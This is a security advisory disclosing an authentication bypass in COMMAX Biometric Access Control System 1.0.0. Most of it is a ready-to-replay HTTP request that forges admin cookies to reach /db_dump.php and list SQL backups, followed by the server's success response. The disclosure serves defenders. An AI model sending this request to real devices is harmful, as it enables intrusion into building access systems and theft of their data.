COMMAX Biometric Access Control System 1.0.0 Authentication Bypass Vendor: COMMAX Co., Ltd. Prodcut web page: https://www.commax.com Affected version: 1.0.0 Summary: Biometric access control system. Desc: The application suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings. Tested on: nginx/1.14.0 (Ubuntu) MariaDB/10.3.15 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5661 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php 02.08.2021 -- The following request with Cookie forging bypasses authentication and lists available SQL backups. GET /db_dump.php HTTP/1.1 Host: 192.168.1.1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.1.1/user_add.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0 Connection: close HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 03 Aug 1984 14:07:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 10316 ::: COMMAX ::: ... ...